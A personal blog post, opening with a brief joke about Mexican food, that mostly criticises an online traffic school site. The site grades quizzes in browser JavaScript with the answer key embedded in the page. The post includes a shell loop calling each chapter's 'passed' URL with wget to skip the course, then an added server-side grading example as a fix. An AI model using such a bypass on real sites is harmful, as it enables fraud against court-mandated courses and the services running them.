dear sweden,
in the spirit of Cinco de Mayo and a recent visit to the local "Mexican Restaurant", it should be brought to your attention that the following items are not typically considered mexican food:
yours truly,
sean
...or how not to code your web application plzkthx.
so last summer, whilst back home chillin with the peeps, i had a most unfortunate traffic enforcement related incident, the details of which are entirely uninteresting but which left me approximately $400 poorer nonetheless. although it presently doesn't affect me to have such infractions on my record (what not owning a car and living on a different continent and everything), i decided to get my record clean via online traffic school. thankfully, the state of california in their infinite wisdom has decided to outsource such a service to anyone willing to pony up the money for a permit and a domain name, thus there were a number of options from which i the consumer could select.
so, off i went in search of an agreeable online service to clear my ticket, with an emphasis towards fast, cheap, and ideally not too dressed up in flash/java. i ended up settling on a to-remain-unnamed .com site whose name seemed to suggest that it was capable of meeting my requisite goals. the site was decidedly "web 1.0", which was sort of what i was looking for, but this was like something written in the mid 90's with an HTML 3.5 book or something. but i digress.
the format of the "traffic school" was a 12 chapter lesson book, with alternating "text" and multiple-choice "quiz" subsections. the text was maybe 10 minutes worth of reading and the quiz another 10 minutes. the site let you freely go back and forth between the text and quiz, and you could do this all at your own pace, so really you could skip the text and answer the questions directly. what's more, if you didn't answer enough questions to advance to the next chapter, you could re-take the quiz at no penalty. of course all of these aspects were proudly and prominently listed on the site, and played a significant part in my decision to use the site. so... so far, so good.
however, after making my way a few chapters in, i came across a rather annoying bug in the site, which caused the answers to the quiz to be reset to blank just as i hit the "submit" button. the first time i thought i must have done something wrong, so i tried again. and again. great. thank you so much for wasting my precious time.
it was pretty clear that there was some sketchy use of javascript going on, so i thought i would take a look-see at the code. turns out the "submit" button didn't submit anything at all, but instead calculated a score based on answers that were stored in the web page itself:
ans[1]="1"; ans[2]="2";ans[3]="1";ans[4]="3";ans[5]="4";ans[6]="1";ans[7]="1";ans[8]="1";ans[9]="1";ans[10]="1";
ans[11] = "2";
function Engine(question, answer) {
    if (answer == ans[question]) {
        done[question] = 1;
    } else {
        done[question] = 0;
    }
    score = done[1]+done[2]+done[3]+done[4]+done[5]+done[6]+done[7]+done[8]+done[9]+done[10]+done[11];
}
heh. it doesn't take a professional programmer to figure out what's going on there. but wait... it gets better. this is the function that gets called when the quiz is "submitted":
function display() {
    document.forms[0].reset();
    document.forms[1].reset();
    document.forms[2].reset();
    document.forms[3].reset();
    document.forms[4].reset();
    document.forms[5].reset();
    document.forms[6].reset();
    document.forms[7].reset();
    document.forms[8].reset();
    document.forms[9].reset();
    document.forms[10].reset();
    if (score==11) {
        window.location="passed5.php?id=XXXX"
    } else {
        window.location="result5.php?id=XXXX"
    }
}
where XXXX is a unique identifier for the particular user.
in other words, if some javascript decides you have reached a certain score, it redirects your browser to a "you've passed" page, which will record your success no questions asked before forwarding you to the next chapter. now, what do you suppose the following snippet of shell script might do?
# i leave it as an exercise to the reader to find the correct value for ${site}
for n in `seq 1 12`; do
    wget --user-agent "l33t h4x0r" -O/dev/null http://${site}/passed${n}.php?id=XXXX
done
srsly. wtf.
and for the record, i by no means am implying that i might have done such a thing.
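for contrast, here is what the server side of such a quiz could look like, as an added example that is not part of the original post and not the site's code: the answer key and the pass record stay on the server, the browser only submits answers, and each chapter is gated on the recorded result of the ones before it. the answer keys, the in-memory store and every function name are constructed for illustration, and the session id is assumed to come from the server's own session layer rather than from a URL parameter.

```javascript
// added example: server-side grading with server-held state (all names hypothetical)
const TOTAL_CHAPTERS = 12;

// constructed answer keys; these never appear in any page sent to the browser
const ANSWER_KEY = {
  1: ["2", "4", "1"],
  2: ["3", "1", "1"],
};

// sessionId -> Set of chapter numbers the server has graded as passed
const progress = new Map();

function openSession(sessionId) {
  if (!progress.has(sessionId)) progress.set(sessionId, new Set());
}

// a chapter is reachable only if every earlier chapter is recorded as passed
function canOpen(sessionId, chapter) {
  const passed = progress.get(sessionId);
  if (!passed) return false;
  if (!Number.isInteger(chapter) || chapter < 1 || chapter > TOTAL_CHAPTERS) return false;
  for (let c = 1; c < chapter; c++) {
    if (!passed.has(c)) return false;
  }
  return true;
}

// body of a POST handler for a quiz; `answers` is untrusted form data
function gradeQuiz(sessionId, chapter, answers) {
  if (!canOpen(sessionId, chapter)) return { status: 403, passed: false };
  const key = ANSWER_KEY[chapter];
  if (!key) return { status: 404, passed: false };
  if (!Array.isArray(answers) || answers.length !== key.length) {
    return { status: 400, passed: false };
  }
  // the score is computed here, never read from the request
  const score = key.reduce((n, want, i) => n + (String(answers[i]) === want ? 1 : 0), 0);
  const passed = score === key.length;
  if (passed) progress.get(sessionId).add(chapter); // the only place a pass is recorded
  return { status: 200, passed, score };
}
```

with this shape, a bare request for a "passed" page has nothing to record: the only way to mark a chapter as done is to post answers that the server itself grades as correct.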